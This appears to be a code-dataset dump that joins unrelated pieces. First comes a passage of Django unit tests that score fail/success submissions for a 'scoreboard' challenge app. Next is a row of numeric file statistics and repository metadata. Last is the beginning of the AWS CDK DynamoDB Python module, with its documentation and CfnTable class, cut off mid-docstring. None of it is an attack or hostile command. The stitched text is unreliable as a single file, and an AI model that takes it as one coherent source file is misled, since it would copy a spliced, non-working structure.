type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailFailFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFourFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 5
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFourFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 5
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventLaterTimestamp(self, mock_utcNow):
pass # Don't worry about later timestamps
| 36.120927 | 133 | 0.579195 | 10,630 | 99,766 | 5.289276 | 0.019661 | 0.067977 | 0.082241 | 0.107568 | 0.903353 | 0.902997 | 0.900009 | 0.899973 | 0.899973 | 0.898195 | 0 | 0.066779 | 0.324108 | 99,766 | 2,761 | 134 | 36.134009 | 0.767036 | 0.022914 | 0 | 0.822328 | 0 | 0 | 0.016245 | 0.015763 | 0 | 0 | 0 | 0 | 0.000869 | 1 | 0.030843 | false | 0.000434 | 0.003475 | 0.000434 | 0.035187 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
edd856baad96b82bdb27c1e64afae8dc5dadb66d | 195,383 | py | Python | .env/Lib/site-packages/aws_cdk/aws_dynamodb/__init__.py | mikeccheung/CloudResumeChallengeBE | 4e5d1c79303af6278324280bbe54b3dc7f44c683 | [
"MIT"
] | null | null | null | .env/Lib/site-packages/aws_cdk/aws_dynamodb/__init__.py | mikeccheung/CloudResumeChallengeBE | 4e5d1c79303af6278324280bbe54b3dc7f44c683 | [
"MIT"
] | null | null | null | .env/Lib/site-packages/aws_cdk/aws_dynamodb/__init__.py | mikeccheung/CloudResumeChallengeBE | 4e5d1c79303af6278324280bbe54b3dc7f44c683 | [
"MIT"
] | null | null | null | """
## Amazon DynamoDB Construct Library
<!--BEGIN STABILITY BANNER-->---


---
<!--END STABILITY BANNER-->
Here is a minimal deployable DynamoDB table definition:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table(self, "Table",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING)
)
```
### Importing existing tables
To import an existing table into your CDK application, use the `Table.fromTableName`, `Table.fromTableArn` or `Table.fromTableAttributes`
factory method. This method accepts table name or table ARN which describes the properties of an already
existing table:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
table = Table.from_table_arn(self, "ImportedTable", "arn:aws:dynamodb:us-east-1:111111111:table/my-table")
# now you can just call methods on the table
table.grant_read_write_data(user)
```
If you intend to use the `tableStreamArn` (including indirectly, for example by creating an
`@aws-cdk/aws-lambda-event-source.DynamoEventSource` on the imported table), you *must* use the
`Table.fromTableAttributes` method and the `tableStreamArn` property *must* be populated.
### Keys
When a table is defined, you must define it's schema using the `partitionKey`
(required) and `sortKey` (optional) properties.
### Billing Mode
DynamoDB supports two billing modes:
* PROVISIONED - the default mode where the table and global secondary indexes have configured read and write capacity.
* PAY_PER_REQUEST - on-demand pricing and scaling. You only pay for what you use and there is no read and write capacity for the table or its global secondary indexes.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table(self, "Table",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
billing_mode=dynamodb.BillingMode.PAY_PER_REQUEST
)
```
Further reading:
https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/HowItWorks.ReadWriteCapacityMode.
### Configure AutoScaling for your table
You can have DynamoDB automatically raise and lower the read and write capacities
of your table by setting up autoscaling. You can use this to either keep your
tables at a desired utilization level, or by scaling up and down at preconfigured
times of the day:
Auto-scaling is only relevant for tables with the billing mode, PROVISIONED.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
read_scaling = table.auto_scale_read_capacity(min_capacity=1, max_capacity=50)
read_scaling.scale_on_utilization(
target_utilization_percent=50
)
read_scaling.scale_on_schedule("ScaleUpInTheMorning",
schedule=appscaling.Schedule.cron(hour="8", minute="0"),
min_capacity=20
)
read_scaling.scale_on_schedule("ScaleDownAtNight",
schedule=appscaling.Schedule.cron(hour="20", minute="0"),
max_capacity=20
)
```
Further reading:
https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/AutoScaling.html
https://aws.amazon.com/blogs/database/how-to-use-aws-cloudformation-to-configure-auto-scaling-for-amazon-dynamodb-tables-and-indexes/
### Amazon DynamoDB Global Tables
You can create DynamoDB Global Tables by setting the `replicationRegions` property on a `Table`:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
global_table = dynamodb.Table(self, "Table",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
replication_regions=["us-east-1", "us-east-2", "us-west-2"]
)
```
When doing so, a CloudFormation Custom Resource will be added to the stack in order to create the replica tables in the
selected regions.
### Encryption
All user data stored in Amazon DynamoDB is fully encrypted at rest. When creating a new table, you can choose to encrypt using the following customer master keys (CMK) to encrypt your table:
* AWS owned CMK - By default, all tables are encrypted under an AWS owned customer master key (CMK) in the DynamoDB service account (no additional charges apply).
* AWS managed CMK - AWS KMS keys (one per region) are created in your account, managed, and used on your behalf by AWS DynamoDB (AWS KMS chages apply).
* Customer managed CMK - You have full control over the KMS key used to encrypt the DynamoDB Table (AWS KMS charges apply).
Creating a Table encrypted with a customer managed CMK:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table(stack, "MyTable",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
encryption=TableEncryption.CUSTOMER_MANAGED
)
# You can access the CMK that was added to the stack on your behalf by the Table construct via:
table_encryption_key = table.encryption_key
```
You can also supply your own key:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
import aws_cdk.aws_kms as kms
encryption_key = kms.Key(stack, "Key",
enable_key_rotation=True
)
table = dynamodb.Table(stack, "MyTable",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
encryption=TableEncryption.CUSTOMER_MANAGED,
encryption_key=encryption_key
)
```
In order to use the AWS managed CMK instead, change the code to:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_dynamodb as dynamodb
table = dynamodb.Table(stack, "MyTable",
partition_key=Attribute(name="id", type=dynamodb.AttributeType.STRING),
encryption=TableEncryption.AWS_MANAGED
)
```
"""
import abc
import builtins
import datetime
import enum
import typing
import jsii
import jsii.compat
import publication
from ._jsii import *
import aws_cdk.aws_applicationautoscaling
import aws_cdk.aws_cloudwatch
import aws_cdk.aws_iam
import aws_cdk.aws_kms
import aws_cdk.core
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.Attribute",
jsii_struct_bases=[],
name_mapping={"name": "name", "type": "type"},
)
class Attribute:
def __init__(self, *, name: str, type: "AttributeType") -> None:
"""Represents an attribute for describing the key schema for the table and indexes.
:param name: The name of an attribute.
:param type: The data type of an attribute.
"""
self._values = {
"name": name,
"type": type,
}
@builtins.property
def name(self) -> str:
"""The name of an attribute."""
return self._values.get("name")
@builtins.property
def type(self) -> "AttributeType":
"""The data type of an attribute."""
return self._values.get("type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "Attribute(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.AttributeType")
class AttributeType(enum.Enum):
"""Data types for attributes within a table.
see
:see: https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/HowItWorks.NamingRulesDataTypes.html#HowItWorks.DataTypes
"""
BINARY = "BINARY"
"""Up to 400KiB of binary data (which must be encoded as base64 before sending to DynamoDB)."""
NUMBER = "NUMBER"
"""Numeric values made of up to 38 digits (positive, negative or zero)."""
STRING = "STRING"
"""Up to 400KiB of UTF-8 encoded text."""
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.BillingMode")
class BillingMode(enum.Enum):
"""DyanmoDB's Read/Write capacity modes."""
PAY_PER_REQUEST = "PAY_PER_REQUEST"
"""Pay only for what you use.
You don't configure Read/Write capacity units.
"""
PROVISIONED = "PROVISIONED"
"""Explicitly specified Read/Write capacity units."""
@jsii.implements(aws_cdk.core.IInspectable)
class CfnTable(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-dynamodb.CfnTable",
):
"""A CloudFormation ``AWS::DynamoDB::Table``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html
cloudformationResource:
:cloudformationResource:: AWS::DynamoDB::Table
"""
def __init__(
self,
scope: aws_cdk.core.Construct,
id: str,
*,
key_schema: typing.Union[
aws_cdk.core.IResolvable,
typing.List[typing.Union["KeySchemaProperty", aws_cdk.core.IResolvable]],
],
attribute_definitions: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "AttributeDefinitionProperty"
]
],
]
] = None,
billing_mode: typing.Optional[str] = None,
global_secondary_indexes: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "GlobalSecondaryIndexProperty"
]
],
]
] = None,
local_secondary_indexes: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "LocalSecondaryIndexProperty"
]
],
]
] = None,
point_in_time_recovery_specification: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "PointInTimeRecoverySpecificationProperty"
]
] = None,
provisioned_throughput: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "ProvisionedThroughputProperty"]
] = None,
sse_specification: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "SSESpecificationProperty"]
] = None,
stream_specification: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "StreamSpecificationProperty"]
] = None,
table_name: typing.Optional[str] = None,
tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]] = None,
time_to_live_specification: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "TimeToLiveSpecificationProperty"]
] = None,
) -> None:
"""Create a new ``AWS::DynamoDB::Table``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param key_schema: ``AWS::DynamoDB::Table.KeySchema``.
:param attribute_definitions: ``AWS::DynamoDB::Table.AttributeDefinitions``.
:param billing_mode: ``AWS::DynamoDB::Table.BillingMode``.
:param global_secondary_indexes: ``AWS::DynamoDB::Table.GlobalSecondaryIndexes``.
:param local_secondary_indexes: ``AWS::DynamoDB::Table.LocalSecondaryIndexes``.
:param point_in_time_recovery_specification: ``AWS::DynamoDB::Table.PointInTimeRecoverySpecification``.
:param provisioned_throughput: ``AWS::DynamoDB::Table.ProvisionedThroughput``.
:param sse_specification: ``AWS::DynamoDB::Table.SSESpecification``.
:param stream_specification: ``AWS::DynamoDB::Table.StreamSpecification``.
:param table_name: ``AWS::DynamoDB::Table.TableName``.
:param tags: ``AWS::DynamoDB::Table.Tags``.
:param time_to_live_specification: ``AWS::DynamoDB::Table.TimeToLiveSpecification``.
"""
props = CfnTableProps(
key_schema=key_schema,
attribute_definitions=attribute_definitions,
billing_mode=billing_mode,
global_secondary_indexes=global_secondary_indexes,
local_secondary_indexes=local_secondary_indexes,
point_in_time_recovery_specification=point_in_time_recovery_specification,
provisioned_throughput=provisioned_throughput,
sse_specification=sse_specification,
stream_specification=stream_specification,
table_name=table_name,
tags=tags,
time_to_live_specification=time_to_live_specification,
)
jsii.create(CfnTable, self, [scope, id, props])
@jsii.member(jsii_name="fromCloudFormation")
@builtins.classmethod
def from_cloud_formation(
cls,
scope: aws_cdk.core.Construct,
id: str,
resource_attributes: typing.Any,
*,
finder: aws_cdk.core.ICfnFinder,
) -> "CfnTable":
"""A factory method that creates a new instance of this class from an object containing the CloudFormation properties of this resource.
Used in the @aws-cdk/cloudformation-include module.
:param scope: -
:param id: -
